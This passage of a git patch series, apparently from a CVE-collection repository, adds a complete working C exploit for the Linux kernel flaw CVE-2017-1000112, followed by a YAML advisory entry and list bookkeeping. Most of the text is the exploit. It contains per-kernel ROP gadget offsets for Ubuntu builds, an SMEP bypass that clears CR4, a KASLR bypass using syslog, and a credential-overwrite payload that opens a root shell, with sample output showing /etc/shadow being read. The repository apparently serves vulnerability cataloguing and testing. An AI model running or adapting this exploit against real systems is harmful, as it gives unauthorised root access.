commit_creds: ffffffffae4a5d20 +// [.] prepare_kernel_cred: ffffffffae4a6110 +// [.] SMEP bypass enabled, mmapping fake stack +// [~] done, fake stack mmapped +// [.] executing payload ffffffffae40008d +// [~] done, should be root now +// [.] checking if we got root +// [+] got r00t ^_^ +// root@ubuntu:/home/user# whoami +// root +// root@ubuntu:/home/user# id +// uid=0(root) gid=0(root) groups=0(root) +// root@ubuntu:/home/user# cat /etc/shadow +// root:!:17246:0:99999:7::: +// daemon:*:17212:0:99999:7::: +// bin:*:17212:0:99999:7::: +// sys:*:17212:0:99999:7::: +// ... +// +// Andrey Konovalov + +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include + +#define ENABLE_KASLR_BYPASS 1 +#define ENABLE_SMEP_BYPASS 1 + +// Will be overwritten if ENABLE_KASLR_BYPASS is enabled. +unsigned long KERNEL_BASE = 0xffffffff81000000ul; + +// Will be overwritten by detect_versions(). +int kernel = -1; + +struct kernel_info { + const char* distro; + const char* version; + uint64_t commit_creds; + uint64_t prepare_kernel_cred; + uint64_t xchg_eax_esp_ret; + uint64_t pop_rdi_ret; + uint64_t mov_dword_ptr_rdi_eax_ret; + uint64_t mov_rax_cr4_ret; + uint64_t neg_rax_ret; + uint64_t pop_rcx_ret; + uint64_t or_rax_rcx_ret; + uint64_t xchg_eax_edi_ret; + uint64_t mov_cr4_rdi_ret; + uint64_t jmp_rcx; +}; + +struct kernel_info kernels[] = { + { "trusty", "4.4.0-21-generic", 0x9d7a0, 0x9da80, 0x4520a, 0x30f75, 0x109957, 0x1a7a0, 0x3d6b7a, 0x1cbfc, 0x76453, 0x49d4d, 0x61300, 0x1b91d }, + { "trusty", "4.4.0-22-generic", 0x9d7e0, 0x9dac0, 0x4521a, 0x28c19d, 0x1099b7, 0x1a7f0, 0x3d781a, 0x1cc4c, 0x764b3, 0x49d5d, 0x61300, 0x48040 }, + { "trusty", "4.4.0-24-generic", 0x9d5f0, 0x9d8d0, 0x4516a, 0x1026cd, 0x107757, 0x1a810, 0x3d7a9a, 0x1cc6c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 }, + { "trusty", "4.4.0-28-generic", 0x9d760, 0x9da40, 0x4516a, 0x3dc58f, 0x1079a7, 0x1a830, 0x3d801a, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 }, + { "trusty", "4.4.0-31-generic", 0x9d760, 0x9da40, 0x4516a, 0x3e223f, 0x1079a7, 0x1a830, 0x3ddcca, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 }, + { "trusty", "4.4.0-34-generic", 0x9d760, 0x9da40, 0x4510a, 0x355689, 0x1079a7, 0x1a830, 0x3ddd1a, 0x1cc8c, 0x763b3, 0x49c5d, 0x612f0, 0x47f40 }, + { "trusty", "4.4.0-36-generic", 0x9d770, 0x9da50, 0x4510a, 0x1eec9d, 0x107a47, 0x1a830, 0x3de02a, 0x1cc8c, 0x763c3, 0x29595, 0x61300, 0x47f40 }, + { "trusty", "4.4.0-38-generic", 0x9d820, 0x9db00, 0x4510a, 0x598fd, 0x107af7, 0x1a820, 0x3de8ca, 0x1cc7c, 0x76473, 0x49c5d, 0x61300, 0x1a77b }, + { "trusty", "4.4.0-42-generic", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3deb7a, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b }, + { "trusty", "4.4.0-45-generic", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3debda, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b }, + { "trusty", "4.4.0-47-generic", 0x9d940, 0x9dc20, 0x4511a, 0x171f8d, 0x107bd7, 0x1a820, 0x3e241a, 0x1cc7c, 0x76463, 0x299f5, 0x61300, 0x1a77b }, + { "trusty", "4.4.0-51-generic", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b }, + { "trusty", "4.4.0-53-generic", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b }, + { "trusty", "4.4.0-57-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x39401d, 0x1097d7, 0x1a820, 0x3e527a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b }, + { "trusty", "4.4.0-59-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dbc4e, 0x1097d7, 0x1a820, 0x3e571a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b }, + { "trusty", "4.4.0-62-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x3ea46f, 0x109837, 0x1a820, 0x3e5e5a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b }, + { "trusty", "4.4.0-63-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b }, + { "trusty", "4.4.0-64-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b }, + { "trusty", "4.4.0-66-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b }, + { "trusty", "4.4.0-67-generic", 0x9eb60, 0x9ee40, 0x4518a, 0x12a9dc, 0x109887, 0x1a820, 0x3e67ba, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b }, + { "trusty", "4.4.0-70-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b }, + { "trusty", "4.4.0-71-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b }, + { "trusty", "4.4.0-72-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b }, + { "trusty", "4.4.0-75-generic", 0x9eb60, 0x9ee40, 0x4518a, 0x303cfd, 0x1098a7, 0x1a820, 0x3e67ea, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b }, + { "trusty", "4.4.0-78-generic", 0x9eb70, 0x9ee50, 0x4518a, 0x30366d, 0x1098b7, 0x1a820, 0x3e710a, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b }, + { "trusty", "4.4.0-79-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x3ebdcf, 0x1099a7, 0x1a830, 0x3e77ba, 0x1cc8c, 0x774e3, 0x49cdd, 0x62330, 0x1a78b }, + { "trusty", "4.4.0-81-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dc688, 0x1099a7, 0x1a830, 0x3e789a, 0x1cc8c, 0x774e3, 0x24487, 0x62330, 0x1a78b }, + { "trusty", "4.4.0-83-generic", 0x9ebc0, 0x9eea0, 0x451ca, 0x2dc6f5, 0x1099b7, 0x1a830, 0x3e78fa, 0x1cc8c, 0x77533, 0x49d1d, 0x62360, 0x1a78b }, + { "xenial", "4.8.0-34-generic", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 }, + { "xenial", "4.8.0-36-generic", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 }, + { "xenial", "4.8.0-39-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 }, + { "xenial", "4.8.0-41-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 }, + { "xenial", "4.8.0-45-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0x49f60 }, + { "xenial", "4.8.0-46-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 }, + { "xenial", "4.8.0-49-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x439bba, 0x102e33, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 }, + { "xenial", "4.8.0-52-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x63e843, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 }, + { "xenial", "4.8.0-54-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x5ada3c, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 }, + { "xenial", "4.8.0-56-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x39d50d, 0x119207, 0x1b170, 0x43a14a, 0x44d4a0, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 }, + { "xenial", "4.8.0-58-generic", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 }, +}; + +// Used to get root privileges. +#define COMMIT_CREDS (KERNEL_BASE + kernels[kernel].commit_creds) +#define PREPARE_KERNEL_CRED (KERNEL_BASE + kernels[kernel].prepare_kernel_cred) + +// Used when ENABLE_SMEP_BYPASS is used. +// - xchg eax, esp ; ret +// - pop rdi ; ret +// - mov dword ptr [rdi], eax ; ret +// - push rbp ; mov rbp, rsp ; mov rax, cr4 ; pop rbp ; ret +// - neg rax ; ret +// - pop rcx ; ret +// - or rax, rcx ; ret +// - xchg eax, edi ; ret +// - push rbp ; mov rbp, rsp ; mov cr4, rdi ; pop rbp ; ret +// - jmp rcx +#define XCHG_EAX_ESP_RET (KERNEL_BASE + kernels[kernel].xchg_eax_esp_ret) +#define POP_RDI_RET (KERNEL_BASE + kernels[kernel].pop_rdi_ret) +#define MOV_DWORD_PTR_RDI_EAX_RET (KERNEL_BASE + kernels[kernel].mov_dword_ptr_rdi_eax_ret) +#define MOV_RAX_CR4_RET (KERNEL_BASE + kernels[kernel].mov_rax_cr4_ret) +#define NEG_RAX_RET (KERNEL_BASE + kernels[kernel].neg_rax_ret) +#define POP_RCX_RET (KERNEL_BASE + kernels[kernel].pop_rcx_ret) +#define OR_RAX_RCX_RET (KERNEL_BASE + kernels[kernel].or_rax_rcx_ret) +#define XCHG_EAX_EDI_RET (KERNEL_BASE + kernels[kernel].xchg_eax_edi_ret) +#define MOV_CR4_RDI_RET (KERNEL_BASE + kernels[kernel].mov_cr4_rdi_ret) +#define JMP_RCX (KERNEL_BASE + kernels[kernel].jmp_rcx) + +// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * * + +typedef unsigned long __attribute__((regparm(3))) (*_commit_creds)(unsigned long cred); +typedef unsigned long __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned long cred); + +void get_root(void) { + ((_commit_creds)(COMMIT_CREDS))( + ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0)); +} + +// * * * * * * * * * * * * * * * * SMEP bypass * * * * * * * * * * * * * * * * + +uint64_t saved_esp; + +// Unfortunately GCC does not support `__atribute__((naked))` on x86, which +// can be used to omit a function's prologue, so I had to use this weird +// wrapper hack as a workaround. Note: Clang does support it, which means it +// has better support of GCC attributes than GCC itself. Funny. +void wrapper() { + asm volatile (" \n\ + payload: \n\ + movq %%rbp, %%rax \n\ + movq $0xffffffff00000000, %%rdx \n\ + andq %%rdx, %%rax \n\ + movq %0, %%rdx \n\ + addq %%rdx, %%rax \n\ + movq %%rax, %%rsp \n\ + call get_root \n\ + ret \n\ + " : : "m"(saved_esp) : ); +} + +void payload(); + +#define CHAIN_SAVE_ESP \ + *stack++ = POP_RDI_RET; \ + *stack++ = (uint64_t)&saved_esp; \ + *stack++ = MOV_DWORD_PTR_RDI_EAX_RET; + +#define SMEP_MASK 0x100000 + +#define CHAIN_DISABLE_SMEP \ + *stack++ = MOV_RAX_CR4_RET; \ + *stack++ = NEG_RAX_RET; \ + *stack++ = POP_RCX_RET; \ + *stack++ = SMEP_MASK; \ + *stack++ = OR_RAX_RCX_RET; \ + *stack++ = NEG_RAX_RET; \ + *stack++ = XCHG_EAX_EDI_RET; \ + *stack++ = MOV_CR4_RDI_RET; + +#define CHAIN_JMP_PAYLOAD \ + *stack++ = POP_RCX_RET; \ + *stack++ = (uint64_t)&payload; \ + *stack++ = JMP_RCX; + +void mmap_stack() { + uint64_t stack_aligned, stack_addr; + int page_size, stack_size, stack_offset; + uint64_t* stack; + + page_size = getpagesize(); + + stack_aligned = (XCHG_EAX_ESP_RET & 0x00000000fffffffful) & ~(page_size - 1); + stack_addr = stack_aligned - page_size * 4; + stack_size = page_size * 8; + stack_offset = XCHG_EAX_ESP_RET % page_size; + + stack = mmap((void*)stack_addr, stack_size, PROT_READ | PROT_WRITE, + MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); + if (stack == MAP_FAILED || stack != (void*)stack_addr) { + perror("[-] mmap()"); + exit(EXIT_FAILURE); + } + + stack = (uint64_t*)((char*)stack_aligned + stack_offset); + + CHAIN_SAVE_ESP; + CHAIN_DISABLE_SMEP; + CHAIN_JMP_PAYLOAD; +} + +// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * * + +#define SYSLOG_ACTION_READ_ALL 3 +#define SYSLOG_ACTION_SIZE_BUFFER 10 + +void mmap_syslog(char** buffer, int* size) { + *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0); + if (*size == -1) { + perror("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)"); + exit(EXIT_FAILURE); + } + + *size = (*size / getpagesize() + 1) * getpagesize(); + *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE, + MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); + + *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size); + if (*size == -1) { + perror("[-] klogctl(SYSLOG_ACTION_READ_ALL)"); + exit(EXIT_FAILURE); + } +} + +unsigned long get_kernel_addr_trusty(char* buffer, int size) { + const char* needle1 = "Freeing unused"; + char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1)); + if (substr == NULL) { + fprintf(stderr, "[-] substring '%s' not found in syslog\n", needle1); + exit(EXIT_FAILURE); + } + + int start = 0; + int end = 0; + for (end = start; substr[end] != '-'; end++); + + const char* needle2 = "ffffff"; + substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2)); + if (substr == NULL) { + fprintf(stderr, "[-] substring '%s' not found in syslog\n", needle2); + exit(EXIT_FAILURE); + } + + char* endptr = &substr[16]; + unsigned long r = strtoul(&substr[0], &endptr, 16); + + r &= 0xffffffffff000000ul; + + return r; +} + +unsigned long get_kernel_addr_xenial(char* buffer, int size) { + const char* needle1 = "Freeing unused"; + char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1)); + if (substr == NULL) { + fprintf(stderr, "[-] substring '%s' not found in syslog\n", needle1); + exit(EXIT_FAILURE); + } + + int start = 0; + int end = 0; + for (start = 0; substr[start] != '-'; start++); + for (end = start; substr[end] != '\n'; end++); + + const char* needle2 = "ffffff"; + substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2)); + if (substr == NULL) { + fprintf(stderr, "[-] substring '%s' not found in syslog\n", needle2); + exit(EXIT_FAILURE); + } + + char* endptr = &substr[16]; + unsigned long r = strtoul(&substr[0], &endptr, 16); + + r &= 0xfffffffffff00000ul; + r -= 0x1000000ul; + + return r; +} + +unsigned long get_kernel_addr() { + char* syslog; + int size; + mmap_syslog(&syslog, &size); + + if (strcmp("trusty", kernels[kernel].distro) == 0 && + strncmp("4.4.0", kernels[kernel].version, 5) == 0) + return get_kernel_addr_trusty(syslog, size); + if (strcmp("xenial", kernels[kernel].distro) == 0 && + strncmp("4.8.0", kernels[kernel].version, 5) == 0) + return get_kernel_addr_xenial(syslog, size); + + printf("[-] KASLR bypass only tested on trusty 4.4.0-* and xenial 4-8-0-*"); + exit(EXIT_FAILURE); +} + +// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * * + +struct ubuf_info { + uint64_t callback; // void (*callback)(struct ubuf_info *, bool) + uint64_t ctx; // void * + uint64_t desc; // unsigned long +}; + +struct skb_shared_info { + uint8_t nr_frags; // unsigned char + uint8_t tx_flags; // __u8 + uint16_t gso_size; // unsigned short + uint16_t gso_segs; // unsigned short + uint16_t gso_type; // unsigned short + uint64_t frag_list; // struct sk_buff * + uint64_t hwtstamps; // struct skb_shared_hwtstamps + uint32_t tskey; // u32 + uint32_t ip6_frag_id; // __be32 + uint32_t dataref; // atomic_t + uint64_t destructor_arg; // void * + uint8_t frags[16][17]; // skb_frag_t frags[MAX_SKB_FRAGS]; +}; + +struct ubuf_info ui; + +void init_skb_buffer(char* buffer, unsigned long func) { + struct skb_shared_info* ssi = (struct skb_shared_info*)buffer; + memset(ssi, 0, sizeof(*ssi)); + + ssi->tx_flags = 0xff; + ssi->destructor_arg = (uint64_t)&ui; + ssi->nr_frags = 0; + ssi->frag_list = 0; + + ui.callback = func; +} + +// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * * + +#define SHINFO_OFFSET 3164 + +void oob_execute(unsigned long payload) { + char buffer[4096]; + memset(&buffer[0], 0x42, 4096); + init_skb_buffer(&buffer[SHINFO_OFFSET], payload); + + int s = socket(PF_INET, SOCK_DGRAM, 0); + if (s == -1) { + perror("[-] socket()"); + exit(EXIT_FAILURE); + } + + struct sockaddr_in addr; + memset(&addr, 0, sizeof(addr)); + addr.sin_family = AF_INET; + addr.sin_port = htons(8000); + addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + + if (connect(s, (void*)&addr, sizeof(addr))) { + perror("[-] connect()"); + exit(EXIT_FAILURE); + } + + int size = SHINFO_OFFSET + sizeof(struct skb_shared_info); + int rv = send(s, buffer, size, MSG_MORE); + if (rv != size) { + perror("[-] send()"); + exit(EXIT_FAILURE); + } + + int val = 1; + rv = setsockopt(s, SOL_SOCKET, SO_NO_CHECK, &val, sizeof(val)); + if (rv != 0) { + perror("[-] setsockopt(SO_NO_CHECK)"); + exit(EXIT_FAILURE); + } + + send(s, buffer, 1, 0); + + close(s); +} + +// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * * + +#define CHUNK_SIZE 1024 + +int read_file(const char* file, char* buffer, int max_length) { + int f = open(file, O_RDONLY); + if (f == -1) + return -1; + int bytes_read = 0; + while (true) { + int bytes_to_read = CHUNK_SIZE; + if (bytes_to_read > max_length - bytes_read) + bytes_to_read = max_length - bytes_read; + int rv = read(f, &buffer[bytes_read], bytes_to_read); + if (rv == -1) + return -1; + bytes_read += rv; + if (rv == 0) + return bytes_read; + } +} + +#define LSB_RELEASE_LENGTH 1024 + +void get_distro_codename(char* output, int max_length) { + char buffer[LSB_RELEASE_LENGTH]; + int length = read_file("/etc/lsb-release", &buffer[0], LSB_RELEASE_LENGTH); + if (length == -1) { + perror("[-] open/read(/etc/lsb-release)"); + exit(EXIT_FAILURE); + } + const char *needle = "DISTRIB_CODENAME="; + int needle_length = strlen(needle); + char* found = memmem(&buffer[0], length, needle, needle_length); + if (found == NULL) { + printf("[-] couldn't find DISTRIB_CODENAME in /etc/lsb-release\n"); + exit(EXIT_FAILURE); + } + int i; + for (i = 0; found[needle_length + i] != '\n'; i++) { + assert(i < max_length); + assert((found - &buffer[0]) + needle_length + i < length); + output[i] = found[needle_length + i]; + } +} + +void get_kernel_version(char* output, int max_length) { + struct utsname u; + int rv = uname(&u); + if (rv != 0) { + perror("[-] uname())"); + exit(EXIT_FAILURE); + } + assert(strlen(u.release) <= max_length); + strcpy(&output[0], u.release); +} + +#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0])) + +#define DISTRO_CODENAME_LENGTH 32 +#define KERNEL_VERSION_LENGTH 32 + +void detect_versions() { + char codename[DISTRO_CODENAME_LENGTH]; + char version[KERNEL_VERSION_LENGTH]; + + get_distro_codename(&codename[0], DISTRO_CODENAME_LENGTH); + get_kernel_version(&version[0], KERNEL_VERSION_LENGTH); + + int i; + for (i = 0; i < ARRAY_SIZE(kernels); i++) { + if (strcmp(&codename[0], kernels[i].distro) == 0 && + strcmp(&version[0], kernels[i].version) == 0) { + printf("[.] kernel version '%s' detected\n", kernels[i].version); + kernel = i; + return; + } + } + + printf("[-] kernel version not recognized\n"); + exit(EXIT_FAILURE); +} + +#define PROC_CPUINFO_LENGTH 4096 + +// 0 - nothing, 1 - SMEP, 2 - SMAP, 3 - SMEP & SMAP +int smap_smep_enabled() { + char buffer[PROC_CPUINFO_LENGTH]; + int length = read_file("/proc/cpuinfo", &buffer[0], PROC_CPUINFO_LENGTH); + if (length == -1) { + perror("[-] open/read(/proc/cpuinfo)"); + exit(EXIT_FAILURE); + } + int rv = 0; + char* found = memmem(&buffer[0], length, "smep", 4); + if (found != NULL) + rv += 1; + found = memmem(&buffer[0], length, "smap", 4); + if (found != NULL) + rv += 2; + return rv; +} + +void check_smep_smap() { + int rv = smap_smep_enabled(); + if (rv >= 2) { + printf("[-] SMAP detected, no bypass available\n"); + exit(EXIT_FAILURE); + } +#if !ENABLE_SMEP_BYPASS + if (rv >= 1) { + printf("[-] SMEP detected, use ENABLE_SMEP_BYPASS\n"); + exit(EXIT_FAILURE); + } +#endif +} + +// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * * + +static bool write_file(const char* file, const char* what, ...) { + char buf[1024]; + va_list args; + va_start(args, what); + vsnprintf(buf, sizeof(buf), what, args); + va_end(args); + buf[sizeof(buf) - 1] = 0; + int len = strlen(buf); + + int fd = open(file, O_WRONLY | O_CLOEXEC); + if (fd == -1) + return false; + if (write(fd, buf, len) != len) { + close(fd); + return false; + } + close(fd); + return true; +} + +void setup_sandbox() { + int real_uid = getuid(); + int real_gid = getgid(); + + if (unshare(CLONE_NEWUSER) != 0) { + printf("[!] unprivileged user namespaces are not available\n"); + perror("[-] unshare(CLONE_NEWUSER)"); + exit(EXIT_FAILURE); + } + if (unshare(CLONE_NEWNET) != 0) { + perror("[-] unshare(CLONE_NEWUSER)"); + exit(EXIT_FAILURE); + } + + if (!write_file("/proc/self/setgroups", "deny")) { + perror("[-] write_file(/proc/self/set_groups)"); + exit(EXIT_FAILURE); + } + if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)) { + perror("[-] write_file(/proc/self/uid_map)"); + exit(EXIT_FAILURE); + } + if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) { + perror("[-] write_file(/proc/self/gid_map)"); + exit(EXIT_FAILURE); + } + + cpu_set_t my_set; + CPU_ZERO(&my_set); + CPU_SET(0, &my_set); + if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) { + perror("[-] sched_setaffinity()"); + exit(EXIT_FAILURE); + } + + if (system("/sbin/ifconfig lo mtu 1500") != 0) { + perror("[-] system(/sbin/ifconfig lo mtu 1500)"); + exit(EXIT_FAILURE); + } + if (system("/sbin/ifconfig lo up") != 0) { + perror("[-] system(/sbin/ifconfig lo up)"); + exit(EXIT_FAILURE); + } +} + +void exec_shell() { + char* shell = "/bin/bash"; + char* args[] = {shell, "-i", NULL}; + execve(shell, args, NULL); +} + +bool is_root() { + // We can't simple check uid, since we're running inside a namespace + // with uid set to 0. Try opening /etc/shadow instead. + int fd = open("/etc/shadow", O_RDONLY); + if (fd == -1) + return false; + close(fd); + return true; +} + +void check_root() { + printf("[.] checking if we got root\n"); + if (!is_root()) { + printf("[-] something went wrong =(\n"); + return; + } + printf("[+] got r00t ^_^\n"); + exec_shell(); +} + +int main(int argc, char** argv) { + printf("[.] starting\n"); + + printf("[.] checking distro and kernel versions\n"); + detect_versions(); + printf("[~] done, versions looks good\n"); + + printf("[.] checking SMEP and SMAP\n"); + check_smep_smap(); + printf("[~] done, looks good\n"); + + printf("[.] setting up namespace sandbox\n"); + setup_sandbox(); + printf("[~] done, namespace sandbox set up\n"); + +#if ENABLE_KASLR_BYPASS + printf("[.] KASLR bypass enabled, getting kernel addr\n"); + KERNEL_BASE = get_kernel_addr(); + printf("[~] done, kernel text: %lx\n", KERNEL_BASE); +#endif + + printf("[.] commit_creds: %lx\n", COMMIT_CREDS); + printf("[.] prepare_kernel_cred: %lx\n", PREPARE_KERNEL_CRED); + + unsigned long payload = (unsigned long)&get_root; + +#if ENABLE_SMEP_BYPASS + printf("[.] SMEP bypass enabled, mmapping fake stack\n"); + mmap_stack(); + payload = XCHG_EAX_ESP_RET; + printf("[~] done, fake stack mmapped\n"); +#endif + + printf("[.] executing payload %lx\n", payload); + oob_execute(payload); + printf("[~] done, should be root now\n"); + + check_root(); + + return 0; +} diff --git a/cve/linux-kernel/2017/yaml/CVE-2017-1000112.yaml b/cve/linux-kernel/2017/yaml/CVE-2017-1000112.yaml new file mode 100644 index 00000000..975ce499 --- /dev/null +++ b/cve/linux-kernel/2017/yaml/CVE-2017-1000112.yaml @@ -0,0 +1,20 @@ +id: CVE-2017-1000112 +source: https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-1000112 +info: + name: Linux kernel is the kernel used by Linux Foundation's open source operating system Linux. + severity: medium + description: | + 由于UFO到非UFO的路径切换,导致可被利用的内存损坏。 + scope-of-influence: + linux_kernel <= 4.13.9 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2017-1000112 + - https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-1000112 + classification: + cvss-metrics: CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.0 + cve-id: CVE-2017-1000112 + cwe-id: CWE-362 + cnvd-id: None + kve-id: None + tags: kernel, Privelege Escalation \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 52d07ef1..b4e66ec7 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -43,6 +43,7 @@ cve: Influx-DB: - CVE-2019-20933 linux-kernel: + - CVE-2017-1000112 - CVE-2021-4204 - CVE-2021-29155 - CVE-2021-22555 From 59e3faf5c22d214254bfc03f792ff6600dd27d19 Mon Sep 17 00:00:00 2001 From: zhangqianyun Date: Fri, 7 Apr 2023 18:09:13 +0800 Subject: [PATCH 067/109] Move CVE-2017-1000112 from openkylin_list.yaml to other_list.yaml --- openkylin_list.yaml | 1 - other_list.yaml | 1 + 2 files changed, 1 insertion(+), 1 deletion(-) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index b4e66ec7..52d07ef1 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -43,7 +43,6 @@ cve: Influx-DB: - CVE-2019-20933 linux-kernel: - - CVE-2017-1000112 - CVE-2021-4204 - CVE-2021-29155 - CVE-2021-22555 diff --git a/other_list.yaml b/other_list.yaml index 5e9b12b0..c02895cc 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -1,6 +1,7 @@ #此收录漏洞列表为非openKylin发行版用例。 cve: linux-kernel: + - CVE-2017-1000112 - CVE-2019-16884 - CVE-2021-33909 - CVE-2021-3493 From bf06d878e6e0f3fe493f26bd7a2d446f8766ead1 Mon Sep 17 00:00:00 2001 From: zhangqianyun <12730721+zhangqianyun@user.noreply.gitee.com> Date: Mon, 10 Apr 2023 06:21:16 +0000 Subject: [PATCH 068/109] update cve/linux-kernel/2017/yaml/CVE-2017-1000112.yaml. Signed-off-by: zhangqianyun <> --- cve/linux-kernel/2017/yaml/CVE-2017-1000112.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cve/linux-kernel/2017/yaml/CVE-2017-1000112.yaml b/cve/linux-kernel/2017/yaml/CVE-2017-1000112.yaml index 975ce499..dea96fb8 100644 --- a/cve/linux-kernel/2017/yaml/CVE-2017-1000112.yaml +++ b/cve/linux-kernel/2017/yaml/CVE-2017-1000112.yaml @@ -1,8 +1,8 @@ id: CVE-2017-1000112 source: https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-1000112 info: - name: Linux kernel is the kernel used by Linux Foundation's open source operating system Linux. - severity: medium + name: Linux内核是Linux基金会的开源操作系统Linux所使用的内核。 + severity: high description: | 由于UFO到非UFO的路径切换,导致可被利用的内存损坏。 scope-of-influence: From 3526c1de9beb034c97589f422caa6cef8d9052e6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E4=BB=A3=E5=B0=8F=E9=B9=8F?= Date: Mon, 10 Apr 2023 15:29:44 +0800 Subject: [PATCH 069/109] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2021-31542?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 